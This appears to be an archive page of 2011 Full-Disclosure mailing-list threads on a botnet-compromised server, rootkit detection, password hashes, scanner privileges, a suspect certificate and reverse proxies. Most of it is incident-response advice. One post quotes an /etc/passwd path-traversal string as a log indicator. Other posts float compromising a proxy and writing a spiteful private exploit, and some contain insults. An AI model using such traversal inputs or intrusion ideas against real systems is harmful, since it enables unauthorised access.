I'm disturbed in the first place that you want to distribute password lists to multiple users. I'm disturbed more so that there is no apparent cognitive dissonance preventing you from functioning enough to have sent that email. Someone please tell me that I'm not the only one disturbed here? And if I am, point to me why please? On Mon, Dec 5, 2011 at 7:30 PM, G V gvasi...@gmail.com wrote: Hi, From your experience, what's the best secure and easy way to update a password list and distribute it to 1000 or so unix users? The users would have different privilege levels and different access on network. Throwing ideas, I can think of: pgp (difficult to maintain a separate file for each user), web app (would need to be sucured over ssl, possible password protected), usb disks (difficult to manage changes). Anyone using an enterprise level app (commercial or not) to share passwords to users, manage changes and so on? Any other ideas I can use? Thank you, George Vasiliu Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] one of my servers has been compromized
If it was a rootkit then trying to run the outdated rkhunter would be a moot point. Whatever seizes the kernel first wins, hands down. Fortunately for him, since the bot was so easy to find in the first place and such a simple way of maintaining it, the box was clearly seized by someone who didn't give a rats ass about it. Probably a skiddie or an automated attack to begin with. As for plugging any security holes, check your httpd error logs. If you noted down the time of the bot files creation date you would look around the same time for suspicious log entries. If they were as careless in scrubbing the logs as they were holding the box it would give you a look into how it may have been compromised. If you're getting things like ../.../../../../etc/passwd then some sort of lfi vuln was likely exploited, start grepping your php files for stuff like include(), or if you're getting something like into outfile then check your mysql user permissions and don't let it have file perms, and then start grepping down for sql vulns. If it comes down to being too much of a hassle to get all the obvious vulns at least then go to your boss, admit there is an issue and that time needs to be taken to remove such legacy code as this could have been a far worse incident if it had been more targetted and the end goal wasn't a botnet. On Dec 5, 2011 3:02 AM, Dan Ballance tzewang.do...@gmail.com wrote: I'm no expert, but here's something to get you started while you wait for more experienced replies. Check for root kits: sudo apt-get install rkhunter sudo rkhunter --update sudo rkhunter --check On 5 December 2011 10:44, Lucio Crusca lu...@sulweb.org wrote: Hello *, I'm not new here, but I've mostly lurked all the time through gmane. I never believed it could happen to me until it actually happened: they compromized one of my servers. It's a Ubuntu 10.04 server with all security patches regularly applied. I'm inclined to believe they used some hole in the web application, which is a old customized Virtuemart version (1.1.3), which is not upgradable because of the invasive code customizations (I'm not the author of that code, so I have no clue about what had been changed back then). Now the problem for me is to track down the security hole. Here is the email my provider received and forwarded to me: Subject: ISP Report; botnet activity on irc.undernet.org [...] Hello, I am an operator on the irc chat network, irc.undernet.org and i would like you to investigate the owner of the Ip addresses that are listed at the foot of this email. This/These host(s) have likely been compromised, and had an altered/rogue process installed on it, and was part of a botnet that was found on our network. The exploit or compromise running on this system is likely to be an irc bot. Can you please alert the person who is responsible, for its security to patch/upgrade, remove the irc process and secure their system. = Unix System owners = A favourite place for hiding the bot(s) is in tmp and in /var/tmp/ or /dev/shm/ or in a users home directory sometimes it may be hidden like /tmp/. ./ or similar. The bot files can usually be found by running these one line commands as the root user. find / -exec grep -l undernet {} + find / -exec grep -l sybnc {} + find / -name *.set | perl -pe 's/.\/\w+-(\w+)-.*/$1/' | sort | uniq find / -name inst | perl -pe 's/.\/\w+-(\w+)-.*/$1/' | sort | uniq netstat -tanp lsof -i tcp:Port number *netstat looking for connections to remote port 6667 or the range of ports between 6660-7000 once you find the port you can use the command, lsof -i tcp:portnumber to determine which process/user it is running under, and terminate it. = Windows System Owners = most windows bots are mIRC scripted bots and generally need a file called mirc.ini to run, you should search for this file. Run a good antivirus scanner and firewall. This Ip/host may be removed from our Irc network due to the risks it presents to our users. Should you need any help with removing the files or bot process, feel free to contact me by mail or on our network, which you connect to using any irc client and issuing /server irc.undernet.org I look forward to your reply Scot * Affected host/IPs, capture time is GMT+1: United kingdom and servers they were connected to. Please note: when resolving server names to IP Addresses that all our servers end with .undernet.org (for example) Tampa.FL.US. is actually Tampa.FL.US.undernet.org Important: If you reply to this mail needing further information, please leave this mail intact, or supply us with the IP Address(es) in question, as we reference these mails by the unique IP Address Time of Capture: DECEMBER 3, 2011 10:03:48 PM List of IP address(es) and server it connected to: my.server.ip.address (CHICAGO.IL.US BUDAPEST.HU.EU
Re: [Full-disclosure] one of my servers has been compromized
Tripwire is awesome for many reasons. The original use of rootkit detection is no longer one of them. It was used back when userland rootkits were big, it has zero effect on kernel rootkits. That being said you can use it to watch other critical files for improper access. Keep tabs on your cron files, configs, and your web pages(why crack password hashes when you can force the login script to hand deliver the plaintext?), etc. Afaik, rootkit detection has made practically no progress. In part because of several advancements in rootkits and also in part of the overzealous trend in reimaging even the slightest compromised box. That being said a modern rootkit detector would need to be installed first and watch for suspicious behavior, such as attempting to hook system calls and watching kernel module loading. Nothing but the kernels mod loader should have a legitimate reason to change the list of kernel modules. In OPs case he really shouldn't need to worry about a rootkit. This wasn't a targeted attack. If it was, or even if the script tried to load a rootkit then he wouldn't even have seen the questionable files in the first place, nor the processes, or the loader. He wouldn't have even been able to grep them. Also deploying a rootkit as part of a serious attack is annoying. You fuck up one thing and not only have you lost the box, but left a strew of evidence that you were trying to hide. Not to mention public rootkits never really caught up with the kernel developments. Most rootkits in place are still targetting 2.4 kernels because only smart dedicated attackers would have the skills to develop and deploy a modern rootkit for a modern kernel. Such an attacker wouldn't make so many rookie/nonchalant mistakes as the attacker on the ops box did. At most he needs to be concerned if he had caught all the backdoors or not. Considering he doesn't realistically need to worry about a rootkit(remember, rootkits are annoying, usually easier and more practical to stay quiet, get want you want, and leave quietly), then he could watch for outgoing connections while monitoring any new open ports that have spawned. I would suggest iptables but the OP stated he doesn't own the server and has no root access. Sure there are many clever ways to reserve access but they all start falling apart as long as your waiting and watching for them to make a peep. On Dec 5, 2011 5:53 AM, Dan Ballance tzewang.do...@gmail.com wrote: Thanks for the heads-up on rkhunter Gage. Is there anything else out there atm that works as a reasonable root kit detector or is such a thing considered impossible now? I realise a skilled attack will be able to bury itself without a trace, but I'm thinking of something that can be used in less skilled breaches such as the one thought to have been identified in this thread. Sometimes something imperfect is still better than nothing I think. Also, am I correct to think that using something like tripwire is the best way to detect root kits properly, but that it obviously needs installing when the box is fresh and before it has been physically connected to a network? thanks to everyone for their valuable contributions here - much appreciated! dan :) On 5 December 2011 11:13, Gage Bystrom themadichi...@gmail.com wrote: If it was a rootkit then trying to run the outdated rkhunter would be a moot point. Whatever seizes the kernel first wins, hands down. Fortunately for him, since the bot was so easy to find in the first place and such a simple way of maintaining it, the box was clearly seized by someone who didn't give a rats ass about it. Probably a skiddie or an automated attack to begin with. As for plugging any security holes, check your httpd error logs. If you noted down the time of the bot files creation date you would look around the same time for suspicious log entries. If they were as careless in scrubbing the logs as they were holding the box it would give you a look into how it may have been compromised. If you're getting things like ../.../../../../etc/passwd then some sort of lfi vuln was likely exploited, start grepping your php files for stuff like include(), or if you're getting something like into outfile then check your mysql user permissions and don't let it have file perms, and then start grepping down for sql vulns. If it comes down to being too much of a hassle to get all the obvious vulns at least then go to your boss, admit there is an issue and that time needs to be taken to remove such legacy code as this could have been a far worse incident if it had been more targetted and the end goal wasn't a botnet. On Dec 5, 2011 3:02 AM, Dan Ballance tzewang.do...@gmail.com wrote: I'm no expert, but here's something to get you started while you wait for more experienced replies. Check for root kits: sudo apt-get install rkhunter sudo rkhunter --update sudo rkhunter --check On 5 December 2011 10:44, Lucio Crusca lu...@sulweb.org wrote
Re: [Full-disclosure] Large password list
I think it simply makes sense though. As more and more common passwords are cracked by the multitude of boxes out there dedicated to cracking hashes, the more and more likely that its gunna turn up in a list or a site somewhere. Add in that Google is really good at finding long strings and numbers if they exist on the net and the fact that the entire idea behind hashes is for them to be uniqueyeah. On Dec 2, 2011 11:17 AM, Charles Morris cmor...@cs.odu.edu wrote: This is extremely depressing. On Fri, Dec 2, 2011 at 2:14 PM, Jeffrey Walton noloa...@gmail.com wrote: On Thu, Dec 1, 2011 at 10:59 PM, Sanguinarious Rose sanguiner...@occultusterra.com wrote: I am at a lack of words for this, why pay $4.99 when you can just do some simple googling? You can even search pastebin and get a mass collection of password lists from dbases. Add a dash of awk and maybe a pinch of sed and viola! Why even spend the CPU cycles to process the password list? See Jon Callas' post on the Random Bits mailing list: No one bothers cracking the crypto (real life edition), http://lists.randombit.net/pipermail/cryptography/2011-December/001870.html. Interestingly (sadly?), googling the hash worked quite well for me on a number of test cases, including common words and proper names. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
I grab a bag of popcorn whenever Juan sends an email. On Wed, Oct 5, 2011 at 4:25 AM, valdis.kletni...@vt.edu wrote: On Wed, 05 Oct 2011 06:49:40 -0300, root said: How can I earn money by migrating exploits? You will inmediately recieve $2 (US Dollars) in your PayPal account for each approved exploit. At $2 per pop, you're going to see a lot of exploits that look like they were mass-migrated by a Perl script, or by an 11 year old, because that's the only two ways it makes economic sense for somebody to work for that pay rate. Man, is it too early in the morning to make popcorn? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
Would you kindly die in a fire? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question on root credentials for scanning
Well it depends on the scanner, and by my guess you're likely using nmap and so yes root privs are required mainly to access raw sockets so it can use its nifty math to figure out all the cool bits. Generally speaking such privs are required by anything that does anything really useful. On Sep 22, 2011 10:47 AM, Shobana Narayanaswamy snar...@opnet.com wrote: Hi: I am a newbie to security and scanning. Here is my question: Do you generally need root credentials in order for the scan to produce detailed results? When I run a scan without root credentials, it comes up very little info. However, when I supply root credentials, I get several useful reports. It appears that the scanner detects the OS version and other s/w component versions only if it is provided root access. Thanks Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Western Union Certificate Error
Comodo got hacked awhile back and mass certificates compromised, judging by that certificate you probably encountered one of the stolen ones. On Wed, Sep 7, 2011 at 7:40 AM, JT S whyteho...@gmail.com wrote: I recently got this error You attempted to reach www.westernunion.com, but instead you actually reached a server identifying itself as wumt.westernunion.com. This may be caused by a misconfiguration on the server or by something more serious. An attacker on your network could be trying to get you to visit a fake (and potentially harmful) version of www.westernunion.com. You should not proceed. Attached is a screenshot of the error and certificate info. SHA-256=9F 26 1E 37 F3 6A 34 88 AD 65 54 88 E0 5C 8A 13 C6 69 D4 FE 2A 25 0F DA 2C 51 13 1E 08 F8 DA 6F Cert was issued by Comodo A google of the SHA comes up with ICANN but other sites come up with nothing... And then I read from comodo themselves they got breached and fraudulent certs were issued... http://www.comodo.com/Comodo-Fraud-Incident-2011-03-23.html CONFIDENTIALITY NOTICE This E-Mail transmission (and/or the documents accompanying it) is for the sole use of the intended recipient(s) and may contain information protected by the attorney-client privilege, the attorney-work-product doctrine or other applicable privileges or confidentiality laws or regulations. If you are not an intended recipient, you may not review, use, copy, disclose or distribute this message or any of the information contained in this message to anyone. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of this message and any attachments. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Reverse Proxy
Well your options are limited. You can look for some type of information disclosure, find other hosts the target owns and then scan their subnets for http servers, etc. And of course if the situation permits it, pwn the proxy and check their logs. Assuming you have permission naturally :P On Tue, Aug 30, 2011 at 1:58 PM, char...@funkymunkey.com wrote: Hi, I am wondering how someone would find out the IP address of a web server if it were behind a reverse proxy, but still on a public IP? Say for instance, the website was using CloudFlare, the A record points to CloudFlare but the website is hosted elsewhere on a public IP. Charlie --- This message was sent from the FunkyMunkey mail server (mail.funkymunkey.co.uk) If you have any queries/complaints regarding mail sent from this server please direct them to ad...@funkymunkey.com Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
People hate you because you've been stealing software, slapping a new wrapper on it, and calling it your own. All other complaints, criticisms, or even approvals is nothing in light of that simple fact. A light that was cast the first time you released InsectPro to FD and all you got was a horde of angry researchers telling you to shutup and stop sending stupid crap like your stolen software to FD. No one is telling you to not use, hell only a few people are telling you not to share it. But almost everybody is telling you to KEEP CRAP LIKE THIS OFF FULL DISCLOSURE. You can argue the crap point all you want and be dismissive, but you'll just be missing the point. On Mon, Aug 29, 2011 at 9:45 AM, Juan Sacco jsa...@insecurityresearch.com wrote: You are comparing a new product with others who have years of development, it is not fair. If you like Core Impact or Metrasploit Express, please pay your license and use them. I'm not pushing you to use my software. INSECT Pro is free and I do it because I like it. Not to like you. Juan Sacco ( runlvl ) On Mon, 29 Aug 2011 13:24:15 -0300, root wrote: On 08/27/2011 08:54 AM, Mario Vilas wrote: On Sat, Aug 27, 2011 at 4:27 AM, GloW - XD doo...@gmail.com wrote: when is smeone going to warez this... it aint free.. http://www.insecurityresearch.com/files/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ It's just a GUI slapped to a bunch of public exploits taken from metasploit and exploit-db. Totally unlike serious software like metasploit-pro and core impact. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available
These guys just ought to be really happy it's a fricken pain in the ass to get mod_frontpage 5.2 working these days or some highly annoyed person could start churning up a private exploit for the known associated vulnerability. That or fire up canvas/core impact(I don't remember which one had the exploit for it), but sadly no public exploit for it or he would likely have gone down fast and hard. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/